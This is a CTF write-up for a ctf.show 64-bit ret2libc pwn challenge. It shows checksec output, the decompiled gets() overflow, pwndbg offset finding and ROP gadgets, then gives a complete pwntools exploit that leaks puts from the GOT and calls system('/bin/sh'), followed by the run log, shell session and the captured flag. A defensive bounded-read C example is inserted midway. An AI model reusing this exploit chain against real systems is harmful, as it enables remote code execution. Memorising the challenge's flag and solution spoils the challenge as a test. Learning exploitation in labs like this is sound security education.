ctf.show 卷王杯 pwn sign-in challenge
pwn sign-in: 64-bit ret2libc
pwn sign-in
(1)
motaly@motaly-VMware-Virtual-Platform:~/桌面$ file pwn
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=0953abcf1dd632cfaa759f2f2948343f9ea5fffa, not stripped
motaly@motaly-VMware-Virtual-Platform:~/桌面$ checksec --file=pwn
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 67 Symbols No 0 1 pwn
(2)
Open the binary in IDA and press F5 (if nothing happens, check whether the keyboard has an Fn key: Fn+F5).
int __fastcall main(int argc, const char **argv, const char **envp)
{
  _BYTE v4[32]; // [rsp+0h] [rbp-20h] BYREF

  alarm(0x3Cu);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  puts("This is easier than you would think...");
  puts("Santa allowed you to ROP me!");
  gets(v4);
  return 0;
}
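For comparison, here is a bounded version of that line read, added here as an example and not part of the writeup or the challenge binary. It keeps the same 32-byte buffer but never writes past it, and reports when a line (for instance a 200-byte input like the cyclic pattern used in the gdb session) would have overflowed. The feed() helper is hypothetical and only exists to run the reader on a constructed string.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 32   /* same size as v4[32] in the challenge's main() */

/* Bounded replacement for gets(v4): reads one line into buf without ever
 * writing past buf[cap-1]. Returns the number of bytes stored, or -1 when
 * the line was longer than cap-1 bytes; in that case the excess is drained
 * so the stream stays in sync, and buf holds only the truncated prefix. */
int read_line_bounded(char *buf, size_t cap, FILE *in) {
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL) {
        if (cap) buf[0] = '\0';
        return -1;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {   /* whole line fit, newline included */
        buf[--len] = '\0';
        return (int)len;
    }
    /* No newline seen: the line either ended at EOF or did not fit. */
    int c = fgetc(in);
    if (c == EOF || c == '\n') return (int)len;   /* it fit exactly */
    while (c != '\n' && c != EOF) c = fgetc(in);  /* drop the overflowing tail */
    return -1;
}

/* Demonstration helper (hypothetical): feed a constructed string through the
 * reader as if it were stdin and return the reader's result. */
int feed(const char *input, char *out, size_t cap) {
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL) return -2;
    int r = read_line_bounded(out, cap, f);
    fclose(f);
    return r;
}

int main(void) {
    char v4[BUF_SIZE];
    char pattern[201];                 /* constructed 200-byte line, like cyclic 200 */
    memset(pattern, 'a', 200);
    pattern[200] = '\0';
    int r1 = feed("hello\n", v4, sizeof v4);
    printf("6-byte line   -> %d (buf=\"%s\")\n", r1, v4);
    int r2 = feed(pattern, v4, sizeof v4);
    printf("200-byte line -> %d (stored %zu bytes, saved rbp/ret untouched)\n", r2, strlen(v4));
    return 0;
}
```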
gets() has no length limit, so there is a stack buffer overflow. Debug with pwndbg to find the offset:
motaly@motaly-VMware-Virtual-Platform:~/桌面$ gdb pwn
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 177 pwndbg commands and 46 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from pwn...
This GDB supports auto-downloading debuginfo from the following URLs:
<https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in pwn)
------- tip of the day (disable with set show-tips off) -------
Pwndbg sets the SIGLARM, SIGBUS, SIGPIPE and SIGSEGV signals so they are not passed to the app; see info signals for full GDB signals configuration
pwndbg> cyclic 200
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
pwndbg> r
Starting program: /home/motaly/桌面/pwn
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
This is easier than you would think...
Santa allowed you to ROP me!
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400712 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
──────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────
 RAX 0
 RBX 0x7fffffffd838 —▸ 0x7fffffffdc0a ◂— 0x6f6d2f656d6f682f ('/home/mo')
 RCX 0x7ffff7e038e0 (_IO_2_1_stdin_) ◂— 0xfbad208b
 RDX 0
 RDI 0x7ffff7e05720 (_IO_stdfile_0_lock) ◂— 0
 RSI 0x7ffff7e03963 (_IO_2_1_stdin_+131) ◂— 0xe05720000000000a /* '\n' */
 R8  0
 R9  0
 R10 0x7ffff7c0e008 ◂— 0x110022000047e8
 R11 0x246
 R12 1
 R13 0
 R14 0
 R15 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
 RBP 0x6161616161616165 ('eaaaaaaa')
 RSP 0x7fffffffd718 ◂— 'faaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
 RIP 0x400712 (main+156) ◂— ret
───────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────
 ► 0x400712 <main+156>    ret    <0x6161616161616166>
   ↓
──────────────────────────────────────────[ STACK ]──────────────────────────────────────────
00:0000│ rsp 0x7fffffffd718 ◂— 'faaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
01:0008│ 0x7fffffffd720 ◂— 'gaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
02:0010│ 0x7fffffffd728 ◂— 'haaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
03:0018│ 0x7fffffffd730 ◂— 'iaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
04:0020│ 0x7fffffffd738 ◂— 'jaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
05:0028│ 0x7fffffffd740 ◂— 'kaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
06:0030│ 0x7fffffffd748 ◂— 'laaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
07:0038│ 0x7fffffffd750 ◂— 'maaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────
 ► 0 0x400712 main+156
   1 0x6161616161616166 None
   2 0x6161616161616167 None
   3 0x6161616161616168 None
   4 0x6161616161616169 None
   5 0x616161616161616a None
   6 0x616161616161616b None
   7 0x616161616161616c None
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l 0x6161616161616166
Finding cyclic pattern of 8 bytes: b'faaaaaaa' (hex: 0x6661616161616161)
Found at offset 40
So the offset from the start of the buffer to the saved return address is 40 bytes (32 bytes of buffer plus the 8-byte saved rbp).
(3)
The binary contains neither system nor the string "/bin/sh", so this is a 64-bit ret2libc: leak a libc address through puts and compute the libc base from it.
Because this is 64-bit, the stack must stay 16-byte aligned before the call, and puts takes its argument in a register, so we need a plain ret gadget and a pop rdi ; ret gadget.
motaly@motaly-VMware-Virtual-Platform:~/桌面$ ROPgadget --binary ./pwn --only 'pop|ret'
Gadgets information
============================================================
0x0000000000400774 : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400776 : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400778 : pop r14 ; pop r15 ; ret
0x000000000040077a : pop r15 ; ret
0x0000000000400773 : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400777 : pop rbp ; pop r14 ; pop r15 ; ret
0x000000000040065d : pop rbp ; ret
0x000000000040077b : pop rdi ; ret
0x0000000000400779 : pop rsi ; pop r15 ; ret
0x0000000000400775 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040053e : ret
0x0000000000400542 : ret 0x200a
This gives the ret gadget at 0x40053e and the pop rdi ; ret gadget at 0x40077b.
(4)
Write the exploit script:
from pwn import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')
io = remote('pwn.challenge.ctf.show', 28228)
# io = process('/home/motaly/桌面/pwn')
elf = ELF('/home/motaly/桌面/pwn')

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.sym['main']
rdi = 0x40077b   # pop rdi ; ret
ret = 0x40053e   # ret, used only to realign the stack

# Stage 1: puts(puts@got) leaks the runtime address of puts, then return to main for a second input
payload = b'a'*40 + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
io.sendlineafter(b'Santa allowed you to ROP me!\n', payload)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
log.success('puts_addr :' + hex(puts_addr))

# Stage 2: identify the libc from the leak, compute the base, and call system("/bin/sh")
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
log.success('libc base: ' + hex(libc_base))
system = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')
payload = b'a'*40 + p64(ret) + p64(rdi) + p64(bin_sh) + p64(system)
io.sendlineafter(b'Santa allowed you to ROP me!\n', payload)
io.interactive()
(5)
Run the script against the remote service to get the flag:
motaly@motaly-VMware-Virtual-Platform:~/桌面$ python3 159.py
[+] Opening connection to pwn.challenge.ctf.show on port 28228: Done
[*] '/home/motaly/桌面/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[DEBUG] Received 0x44 bytes:
    b'This is easier than you would think...\n'
    b'Santa allowed you to ROP me!\n'
[DEBUG] Sent 0x49 bytes:
    00000000  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    00000020  61 61 61 61 61 61 61 61  7b 07 40 00 00 00 00 00  │aaaa│aaaa│{·@·│····│
    00000030  18 10 60 00 00 00 00 00  50 05 40 00 00 00 00 00  │··`·│····│P·@·│····│
    00000040  76 06 40 00 00 00 00 00  0a                       │v·@·│····│·│
    00000049
[DEBUG] Received 0x4b bytes:
    00000000  c0 c9 18 31 f6 7f 0a 54  68 69 73 20 69 73 20 65  │···1│···T│his │is e│
    00000010  61 73 69 65 72 20 74 68  61 6e 20 79 6f 75 20 77  │asie│r th│an y│ou w│
    00000020  6f 75 6c 64 20 74 68 69  6e 6b 2e 2e 2e 0a 53 61  │ould│ thi│nk..│.·Sa│
    00000030  6e 74 61 20 61 6c 6c 6f  77 65 64 20 79 6f 75 20  │nta │allo│wed │you │
    00000040  74 6f 20 52 4f 50 20 6d  65 21 0a                 │to R│OP m│e!·│
    0000004b
[+] puts_addr :0x7ff63118c9c0
[+] There are multiple libc that meet current constraints :
0 - libc6_2.27-0ubuntu2_amd64
1 - libc-2.36-22.mga9.i586
2 - libc6_2.19-0ubuntu6.5_amd64
3 - libc6_2.27-3ubuntu1_amd64
4 - libc-2.36-33.mga9.i586
5 - libc6_2.37-0ubuntu1_amd64
6 - libc6_2.27-0ubuntu3_amd64
7 - libc-2.32-6.fc33.i686
8 - libc-2.32-8.fc33.i686
9 - libc-2.32-7.fc33.i686
[+] Choose one : 3
[+] libc base: 0x7ff63110c000
[DEBUG] Sent 0x49 bytes:
    00000000  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    00000020  61 61 61 61 61 61 61 61  3e 05 40 00 00 00 00 00  │aaaa│aaaa│>·@·│····│
    00000030  7b 07 40 00 00 00 00 00  9a fe 2b 31 f6 7f 00 00  │{·@·│····│··+1│····│
    00000040  40 b4 15 31 f6 7f 00 00  0a                       │@··1│····│·│
    00000049
[*] Switching to interactive mode
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x64 bytes:
    b'bin\n'
    b'boot\n'
    b'dev\n'
    b'etc\n'
    b'flag\n'
    b'home\n'
    b'lib\n'
    b'lib32\n'
    b'lib64\n'
    b'media\n'
    b'mnt\n'
    b'opt\n'
    b'proc\n'
    b'pwn\n'
    b'root\n'
    b'run\n'
    b'sbin\n'
    b'srv\n'
    b'sys\n'
    b'tmp\n'
    b'usr\n'
    b'var\n'
bin
boot
dev
etc
flag
home
lib
lib32
lib64
media
mnt
opt
proc
pwn
root
run
sbin
srv
sys
tmp
usr
var
$ cat flag
[DEBUG] Sent 0xa bytes:
    b'cat flag\n'
[DEBUG] Received 0x2e bytes:
    b'ctfshow{91e24165-1656-46e7-ae12-571f5f1f5b4d}\n'
ctfshow{91e24165-1656-46e7-ae12-571f5f1f5b4d}